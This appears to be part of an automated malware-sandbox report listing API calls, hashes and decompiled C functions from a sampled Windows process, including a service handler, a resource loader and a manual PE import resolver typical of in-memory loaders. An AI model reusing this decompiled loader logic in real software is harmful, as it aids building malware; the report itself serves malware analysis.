                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CreateReadWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2705228764-0
                                                                                                                        • Opcode ID: 5cd404f22b3cd12ddc7d7577c1f9aabfb786d46380eccbe6a4ff4290f236b758
                                                                                                                        • Instruction ID: 52941c637d6536255a51803a9143df598c2cda5ccb6e77c6c0afdcd6468fd4c2
                                                                                                                        • Opcode Fuzzy Hash: 5cd404f22b3cd12ddc7d7577c1f9aabfb786d46380eccbe6a4ff4290f236b758
                                                                                                                        • Instruction Fuzzy Hash: CA21B372500789ABD320DE25CC88FAB7BACEBCA720F00091DFA1592141D771E915C7B1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333B60, Relevance: 12.1, APIs: 8, Instructions: 67memoryregistrythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E6F333B60(intOrPtr* _a8) {
				struct _SERVICE_STATUS* _v4;
				int _v8;
				CHAR* _t9;
				int _t10;
				void* _t13;
				int _t14;
				signed int _t18;
				short* _t20;
				int _t21;
				void _t22;
				void* _t23;
				void* _t26;
				intOrPtr* _t27;
				void* _t30;

				_t9 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
				_t10 = SetCurrentDirectoryA(_t9);
				_t27 = _a8;
				 *0x6f34043c = 0x20;
				 *0x6f340440 = 2;
				 *0x6f340444 = 0x85;
				 *0x6f340448 = 0;
				 *0x6f34044c = 0;
				 *0x6f340450 = 0;
				 *0x6f340454 = 0;
				__imp__RegisterServiceCtrlHandlerExW( *_t27, E6F333A70, 0, _t23, _t26);
				 *0x6f340394 = _t10;
				if(_t10 == 0) {
					 *0x6f340440 = 1;
					SetServiceStatus(0, 0x6f34043c);
					ExitProcess(0);
				}
				_t21 = _v8;
				 *0x6f340440 = 4;
				_t30 = _t21 - 1;
				if(_t30 <= 0) {
					L7:
					_t13 = HeapAlloc(GetProcessHeap(), 8, 4);
					if(_t13 != 0) {
						_t22 = M6F3404E8; // 0x1
						 *_t13 = _t22;
						CloseHandle(CreateThread(0, 0, E6F333930, _t13, 0, 0));
					}
					L9:
					_v4 = 0x6f34043c;
					_t14 =  *0x6f340394; // 0x0
					_v8 = _t14;
					return SetServiceStatus(??, ??);
				}
				_t18 = 1;
				if(_t30 <= 0) {
					goto L7;
				} else {
					while(1) {
						_t20 =  *((intOrPtr*)(_t27 + _t18 * 4));
						if( *_t20 == 0x73 &&  *((intOrPtr*)(_t20 + 2)) == 0) {
							goto L9;
						}
						_t18 = _t18 + 1;
						if(_t18 < _t21) {
							continue;
						}
						goto L7;
					}
					goto L9;
				}
			}

















                                                                                                                        0x6f333b60
                                                                                                                        0x6f333b68
                                                                                                                        0x6f333b6e
                                                                                                                        0x6f333b75
                                                                                                                        0x6f333b7f
                                                                                                                        0x6f333b89
                                                                                                                        0x6f333b93
                                                                                                                        0x6f333b99
                                                                                                                        0x6f333b9f
                                                                                                                        0x6f333ba5
                                                                                                                        0x6f333bb3
                                                                                                                        0x6f333bb9
                                                                                                                        0x6f333bc0
                                                                                                                        0x6f333c47
                                                                                                                        0x6f333c51
                                                                                                                        0x6f333c58
                                                                                                                        0x6f333c58
                                                                                                                        0x6f333bc2
                                                                                                                        0x6f333bc6
                                                                                                                        0x6f333bd0
                                                                                                                        0x6f333bd3
                                                                                                                        0x6f333bf4
                                                                                                                        0x6f333bff
                                                                                                                        0x6f333c07
                                                                                                                        0x6f333c09
                                                                                                                        0x6f333c19
                                                                                                                        0x6f333c22
                                                                                                                        0x6f333c22
                                                                                                                        0x6f333c28
                                                                                                                        0x6f333c2a
                                                                                                                        0x6f333c32
                                                                                                                        0x6f333c37
                                                                                                                        0x6f333c3b
                                                                                                                        0x6f333c3b
                                                                                                                        0x6f333bd5
                                                                                                                        0x6f333bd8
                                                                                                                        0x00000000
                                                                                                                        0x6f333be0
                                                                                                                        0x6f333be0
                                                                                                                        0x6f333be0
                                                                                                                        0x6f333be7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333bef
                                                                                                                        0x6f333bf2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333bf2
                                                                                                                        0x00000000
                                                                                                                        0x6f333be0

                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(00A56008), ref: 6F333B68
                                                                                                                        • RegisterServiceCtrlHandlerExW.ADVAPI32(?,6F333A70,00000000), ref: 6F333BB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,6F333A70,00000000), ref: 6F333BF8
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,6F333A70,00000000), ref: 6F333BFF
                                                                                                                        • CreateThread.KERNEL32 ref: 6F333C1B
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,6F333A70,00000000), ref: 6F333C22
                                                                                                                        • SetServiceStatus.ADVAPI32(00000000,6F34043C,?,6F333A70,00000000), ref: 6F333C51
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F333C58
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcessService$AllocCloseCreateCtrlCurrentDirectoryExitHandleHandlerRegisterStatusThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2085172483-0
                                                                                                                        • Opcode ID: 56cbdfa558f69dca54de98f1c3b66dfcbbc10ae8b0920435d1bc4e9e75a7721a
                                                                                                                        • Instruction ID: 4e0bf0015c270c5cdf686b2fdccda863b4e9eed7adce4186e8579dfcc027ec46
                                                                                                                        • Opcode Fuzzy Hash: 56cbdfa558f69dca54de98f1c3b66dfcbbc10ae8b0920435d1bc4e9e75a7721a
                                                                                                                        • Instruction Fuzzy Hash: D22171B2A00A90EFCB20EF65C449A06BBBEFBE6724F50950EE54587310CB75A069CF11
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334E50, Relevance: 12.1, APIs: 8, Instructions: 63memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334E50(struct HINSTANCE__* _a4, WCHAR* _a8) {
				signed int _t20;
				struct HINSTANCE__* _t22;
				int _t23;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				void* _t32;

				_t22 = _a4;
				_t30 = 0;
				_t28 = FindResourceW(_t22, _a8, 5);
				if(_t28 == 0) {
					return 0;
				} else {
					_t32 = LoadResource(_t22, _t28);
					if(_t32 != 0) {
						_t23 = SizeofResource(_t22, _t28);
						_t29 = LockResource(_t32);
						if(_t29 != 0) {
							_t30 = HeapAlloc(GetProcessHeap(), 8, _t23);
							RtlMoveMemory(_t30, _t29, _t23);
							_t20 =  *(_t30 + 0xc);
							if((_t20 & 0x40000000) == 0) {
								 *(_t30 + 8) =  *(_t30 + 8) & 0xfffbffff | 0x08000080;
							}
							 *(_t30 + 0xc) = _t20 & 0xefffffff;
							 *((intOrPtr*)(_t30 + 0x16)) = 0;
						}
						FreeResource(_t32);
					}
					return _t30;
				}
			}










                                                                                                                        0x6f334e55
                                                                                                                        0x6f334e5f
                                                                                                                        0x6f334e67
                                                                                                                        0x6f334e6b
                                                                                                                        0x6f334ee9
                                                                                                                        0x6f334e6d
                                                                                                                        0x6f334e76
                                                                                                                        0x6f334e7a
                                                                                                                        0x6f334e85
                                                                                                                        0x6f334e8d
                                                                                                                        0x6f334e91
                                                                                                                        0x6f334ea4
                                                                                                                        0x6f334ea8
                                                                                                                        0x6f334ead
                                                                                                                        0x6f334eb5
                                                                                                                        0x6f334ec6
                                                                                                                        0x6f334ec6
                                                                                                                        0x6f334ed0
                                                                                                                        0x6f334ed3
                                                                                                                        0x6f334ed3
                                                                                                                        0x6f334ed7
                                                                                                                        0x6f334ed7
                                                                                                                        0x6f334ee3
                                                                                                                        0x6f334ee3

                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000005), ref: 6F334E61
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 6F334E70
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 6F334E7E
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 6F334E87
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 6F334E96
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334E9D
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6F334EA8
                                                                                                                        • FreeResource.KERNEL32(00000000), ref: 6F334ED7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$Heap$AllocFindFreeLoadLockMemoryMoveProcessSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1815471765-0
                                                                                                                        • Opcode ID: f656d0bbd55f484103c88bf511f25de415d8a019537d68e7b4a1f8ba1e757561
                                                                                                                        • Instruction ID: 5552bbe0884fbf667e1d4cc689b403cf4a17fa970377ca752b7090be4ae3ed36
                                                                                                                        • Opcode Fuzzy Hash: f656d0bbd55f484103c88bf511f25de415d8a019537d68e7b4a1f8ba1e757561
                                                                                                                        • Instruction Fuzzy Hash: C211C673A00F59ABD320DBBACC48E67BBADFB86771F00851DF516C2250DA35D8108760
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004D8A3D, Relevance: 10.6, APIs: 7, Instructions: 146registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D8A5C
                                                                                                                        • _wcscpy.LIBCMT ref: 004D8AF5
                                                                                                                        • _wcscat.LIBCMT ref: 004D8B03
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000003,?), ref: 004D8B22
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000003,?), ref: 004D8B38
                                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000), ref: 004D8B54
                                                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000003,00000000,?,00000000), ref: 004D8B6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateOpen$H_prolog3_wcscat_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4233506698-0
                                                                                                                        • Opcode ID: 51e46ebc9f1460d57af698c2f93d9317549ca2521cb69f48d3185473187a247b
                                                                                                                        • Instruction ID: af9df4a72677d03553045917ee85afd16f459e38d70657900af2cd083c6ddade
                                                                                                                        • Opcode Fuzzy Hash: 51e46ebc9f1460d57af698c2f93d9317549ca2521cb69f48d3185473187a247b
                                                                                                                        • Instruction Fuzzy Hash: 78515EB290428DAEDB11DB94DD95BFE77BCAB08304F14806FF505A7382EA745F088B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0050416C, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 144COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0050417A
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 00503AC5: __EH_prolog3_catch.LIBCMT ref: 00503AD3
                                                                                                                          • Part of subcall function 00503AC5: _malloc.LIBCMT ref: 00503AFA
                                                                                                                          • Part of subcall function 00503AC5: __CxxThrowException@8.LIBCMT ref: 00503C2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalH_prolog3Section$Initialize$DeleteEnterException@8H_prolog3_catchLeaveThrow_malloc
                                                                                                                        • String ID: MOZILLA$NONE$OPERA$ProxySearch: Found setting $TV3REG
                                                                                                                        • API String ID: 3938852506-2993174309
                                                                                                                        • Opcode ID: 092a9cf1d48688292355860b95b26bdc76dba3e182ba9c484104556b4be0d7e7
                                                                                                                        • Instruction ID: bb87ceb9de428671a06510b63d19646442044be919961f2de3eb51c57445bc14
                                                                                                                        • Opcode Fuzzy Hash: 092a9cf1d48688292355860b95b26bdc76dba3e182ba9c484104556b4be0d7e7
                                                                                                                        • Instruction Fuzzy Hash: AB51F4B4904148EADB04FB64C962AED7F74AF31348F14449EF5021B1E2EB386F09CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B4A15, Relevance: 10.6, APIs: 7, Instructions: 142libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(00000002), ref: 004B4A4A
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004B4A6C
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004B4A84
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104,00000001), ref: 004B4AA9
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 004B4ABE
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 004B4AC5
                                                                                                                          • Part of subcall function 004B48A9: CompareStringA.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,004B4B75,?,?,?,?,?,?,?,?), ref: 004B48BF
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004B4BC5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Module$DirectoryFileLibraryName$CompareFreeHandleLoadStringSystemWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3624046510-0
                                                                                                                        • Opcode ID: ecc8c65531ea957c34a6aa78dc41afa616b0932244301d07a5f4c038a86935a2
                                                                                                                        • Instruction ID: 7bada881394fb758a7ba3291e7c2cee9e8d025cd33408074cb11b271dc47fdee
                                                                                                                        • Opcode Fuzzy Hash: ecc8c65531ea957c34a6aa78dc41afa616b0932244301d07a5f4c038a86935a2
                                                                                                                        • Instruction Fuzzy Hash: F751817294412D9ACF21DBA4DC94AEB77BCAF59304F0044E6D549D3102EA34DB888F64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F331720, Relevance: 10.6, APIs: 7, Instructions: 138memorylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F331720(void* __edi) {
				struct HINSTANCE__* _v4;
				intOrPtr* _v8;
				intOrPtr _t40;
				intOrPtr _t42;
				struct HINSTANCE__* _t44;
				signed int _t46;
				intOrPtr _t47;
				signed short _t48;
				CHAR* _t49;
				_Unknown_base(*)()* _t51;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				void* _t60;
				intOrPtr* _t67;
				signed short* _t70;
				intOrPtr _t75;
				intOrPtr* _t78;
				void* _t83;
				signed short* _t88;
				void* _t94;
				signed short _t114;

				_t83 = __edi;
				_t40 =  *((intOrPtr*)(__edi + 0xc0));
				if(_t40 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
					return 0;
				} else {
					_t67 =  *((intOrPtr*)(__edi + 0x144)) + _t40;
					_t42 =  *((intOrPtr*)(_t67 + 0xc));
					_v8 = _t67;
					if(_t42 == 0) {
						L30:
						return 0;
					} else {
						_t94 = _v4;
						while(1) {
							_t44 = LoadLibraryA( *((intOrPtr*)(_t83 + 0x144)) + _t42);
							_v4 = _t44;
							if(_t44 == 0) {
								break;
							}
							_t46 =  *(_t83 + 0x154);
							if( *(_t83 + 0x150) < _t46) {
								L16:
								if(_t94 != 0) {
									_t53 =  *(_t83 + 0x150);
									_t54 = _t53 + 1;
									 *(_t83 + 0x150) = _t54;
									if( *((intOrPtr*)(_t94 + _t53 * 4)) != 0) {
										 *((intOrPtr*)(_t94 + _t54 * 4)) = _v4;
										 *(_t83 + 0x150) =  *(_t83 + 0x150) + 1;
									}
								}
								_t47 =  *((intOrPtr*)(_t83 + 0x144));
								_t78 = _v8;
								_t88 =  *((intOrPtr*)(_t67 + 0x10)) + _t47;
								_t70 = _t88;
								if( *((intOrPtr*)(_t78 + 4)) == 0) {
									L22:
									_t48 =  *_t70;
									_t114 = _t48;
									if(_t114 == 0) {
										L29:
										_t42 =  *((intOrPtr*)(_t78 + 0x20));
										_v8 = _t78 + 0x14;
										if(_t42 != 0) {
											_t67 = _v8;
											continue;
										} else {
											goto L30;
										}
									} else {
										L23:
										L23:
										if(_t114 >= 0) {
											_t49 = _t48 +  *((intOrPtr*)(_t83 + 0x144)) + 2;
										} else {
											_t49 = _t48 & 0x0000ffff;
										}
										_t51 = GetProcAddress(_v4, _t49);
										 *_t88 = _t51;
										if(_t51 == 0) {
											break;
										}
										_t48 = _t70[2];
										_t70 =  &(_t70[2]);
										_t88 =  &(_t88[2]);
										if(_t48 != 0) {
											goto L23;
										} else {
											_t78 = _v8;
											goto L29;
										}
									}
								} else {
									_t75 =  *_t78;
									if(_t75 == 0) {
										return 8;
									} else {
										_t70 = _t75 + _t47;
										goto L22;
									}
								}
							} else {
								if(_t46 == 0) {
									_t55 = 0x10;
								} else {
									_t55 = _t46 + _t46;
								}
								 *(_t83 + 0x154) = _t55;
								_t94 = HeapAlloc(GetProcessHeap(), 8, _t55 * 4);
								if(_t94 == 0) {
									return 3;
								} else {
									_t59 =  *(_t83 + 0x150);
									if(_t59 != 0) {
										RtlMoveMemory(_t94,  *(_t83 + 0x14c), _t59 + _t59 + _t59 + _t59);
									}
									_t60 =  *(_t83 + 0x14c);
									if(_t60 != 0) {
										HeapFree(GetProcessHeap(), 0, _t60);
									}
									 *(_t83 + 0x14c) = _t94;
									goto L16;
								}
							}
							goto L35;
						}
						return 6;
					}
				}
				L35:
			}


























                                                                                                                        0x6f331720
                                                                                                                        0x6f331720
                                                                                                                        0x6f33172b
                                                                                                                        0x6f3318c0
                                                                                                                        0x6f33173e
                                                                                                                        0x6f331745
                                                                                                                        0x6f331747
                                                                                                                        0x6f33174c
                                                                                                                        0x6f331752
                                                                                                                        0x6f33188e
                                                                                                                        0x6f331896
                                                                                                                        0x6f331758
                                                                                                                        0x6f331758
                                                                                                                        0x6f331764
                                                                                                                        0x6f33176d
                                                                                                                        0x6f331773
                                                                                                                        0x6f331779
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33177f
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3317fb
                                                                                                                        0x6f3317fd
                                                                                                                        0x6f3317ff
                                                                                                                        0x6f331809
                                                                                                                        0x6f33180a
                                                                                                                        0x6f331812
                                                                                                                        0x6f331818
                                                                                                                        0x6f33181c
                                                                                                                        0x6f33181c
                                                                                                                        0x6f331812
                                                                                                                        0x6f331825
                                                                                                                        0x6f33182b
                                                                                                                        0x6f33182f
                                                                                                                        0x6f331835
                                                                                                                        0x6f331837
                                                                                                                        0x6f331842
                                                                                                                        0x6f331842
                                                                                                                        0x6f331844
                                                                                                                        0x6f331846
                                                                                                                        0x6f33187c
                                                                                                                        0x6f33187c
                                                                                                                        0x6f331882
                                                                                                                        0x6f331888
                                                                                                                        0x6f331760
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331848
                                                                                                                        0x00000000
                                                                                                                        0x6f331848
                                                                                                                        0x6f331848
                                                                                                                        0x6f331855
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33185f
                                                                                                                        0x6f331865
                                                                                                                        0x6f331869
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33186b
                                                                                                                        0x6f33186e
                                                                                                                        0x6f331871
                                                                                                                        0x6f331876
                                                                                                                        0x00000000
                                                                                                                        0x6f331878
                                                                                                                        0x6f331878
                                                                                                                        0x00000000
                                                                                                                        0x6f331878
                                                                                                                        0x6f331876
                                                                                                                        0x6f331839
                                                                                                                        0x6f331839
                                                                                                                        0x6f33183d
                                                                                                                        0x6f3318ae
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183f
                                                                                                                        0x00000000
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183d
                                                                                                                        0x6f33178d
                                                                                                                        0x6f33178f
                                                                                                                        0x6f331795
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f3317aa
                                                                                                                        0x6f3317b9
                                                                                                                        0x6f3317bd
                                                                                                                        0x6f3318a2
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317cb
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317da
